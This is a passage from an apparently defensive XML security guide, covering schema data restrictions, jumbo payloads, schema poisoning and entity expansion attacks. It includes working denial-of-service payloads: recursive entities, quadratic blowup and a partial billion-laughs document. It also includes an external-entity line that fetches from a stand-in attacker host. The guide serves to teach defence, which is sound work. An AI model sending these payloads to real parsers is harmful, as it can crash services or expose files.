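Passing &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; to &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; raises &amp;lt;tt&amp;gt;ValueError&amp;lt;/tt&amp;gt; before any calculation takes place.&lt;br /&gt;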
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a specific length (let's say 8), the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet can specify it as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
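&lt;br /&gt;
The same approach applies to numeric values. As a minimal sketch, assuming a hypothetical &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element and an illustrative upper bound of 1000 (neither comes from a real application), the standard facets &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; could keep a number inside the range the application can store:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- Assumed bounds: adjust to what the application can actually store --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;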
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. They were introduced in XML Schema 1.1, so validators limited to version 1.0 do not support them. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed.&lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will never be zero, while still allowing negative numbers as valid denominators.&lt;br /&gt;
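&lt;br /&gt;
For validators that do not support assertions, one possible alternative (a sketch, not the only option) is a union of the built-in types &amp;lt;tt&amp;gt;negativeInteger&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt;, which together cover every integer except zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- Every integer except zero: either a negative or a positive value --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:union memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;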
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences leaves the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of buy elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
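&lt;br /&gt;
As a sketch of the bounded alternative, the declaration of the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; element inside the sequence could carry an explicit limit. The value 100 is an assumption chosen for illustration; the appropriate maximum depends on what the application can process:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!-- Illustrative limit: at most 100 buy elements per operation --&amp;gt;&lt;br /&gt;
&amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;100&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With a limit like this, a validating parser should reject a document that contains more than 100 &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements before the application processes them.&lt;br /&gt;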
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid this attack, you must use a schema with strong data types for each value, defining properly nested structures with specific arrangements and numbers of items. The content of each attribute and element should be properly analyzed to contain valid values before being stored or processed. &lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
•	Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
•	Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;soapenv:Envelope xmlns:soapenv=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot; xmlns:ext=&amp;quot;http://com/ibm/was/wssample/sei/echo/b2b/external&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;soapenv:Header largename1=&amp;quot;largevalue&amp;quot; largename2=&amp;quot;largevalue&amp;quot; largename3=&amp;quot;largevalue&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE TAG [&lt;br /&gt;
     &amp;lt;!ENTITY FILE  SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TAG&amp;gt;&amp;amp;FILE;&amp;lt;/TAG&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
; Recommendation&lt;br /&gt;
Check the document size prior to parsing its contents, and use an XML schema to validate the document structure. &lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document; to be used safely, there must be a way to check the integrity of the embedded schema.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 &amp;lt;pre&amp;gt;-rw-rw-rw-  1 user  staff  743 Jan 15 12:32 note.dtd&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML document or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text, so an attacker able to intercept the connection could sniff and modify the schema before it reaches the end user:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE note SYSTEM &amp;quot;http://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/note&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted over unencrypted HTTP. One tool available to facilitate this type of attack is mitmproxy.&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an Internet Protocol (IP) address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own IP addresses.&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like https://example.com/note.dtd. In a normal scenario, the hostname example.com resolves to the IP 1.1.1.1:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 1.1.1.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker:&lt;br /&gt;
 &amp;lt;pre&amp;gt;$ host example.com&lt;br /&gt;
example.com has address 2.2.2.2&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
;Recommendation&lt;br /&gt;
To avoid the schema poisoning attack, you must use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
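&lt;br /&gt;
One way to enforce the use of a local copy is an OASIS XML Catalog, which maps a system identifier to a local file. The following is a minimal sketch, assuming the parser in use is configured with a catalog resolver; the local path &amp;lt;tt&amp;gt;/opt/schemas/note.dtd&amp;lt;/tt&amp;gt; is hypothetical:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;catalog xmlns=&amp;quot;urn:oasis:names:tc:entity:xmlns:xml:catalog&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!-- Resolve the remote identifier to a reviewed local copy (hypothetical path) --&amp;gt;&lt;br /&gt;
  &amp;lt;system systemId=&amp;quot;http://example.com/note.dtd&amp;quot; uri=&amp;quot;file:///opt/schemas/note.dtd&amp;quot;/&amp;gt;&lt;br /&gt;
&amp;lt;/catalog&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With such a mapping in place, a reference to the remote DTD would be resolved from the local file, which should itself be protected with restrictive permissions.&lt;br /&gt;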
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; references another entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that entity &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined in terms of entity &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, the schema describes a circular reference between entities:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE A [&lt;br /&gt;
&amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
&amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt; ]&amp;gt;&lt;br /&gt;
&amp;lt;A&amp;gt;&amp;amp;A;&amp;lt;/A&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n^2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
  &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(100,000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;TEST&amp;gt;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(100,000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...&amp;lt;/TEST&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE TEST [&lt;br /&gt;
 &amp;lt;!ELEMENT TEST ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
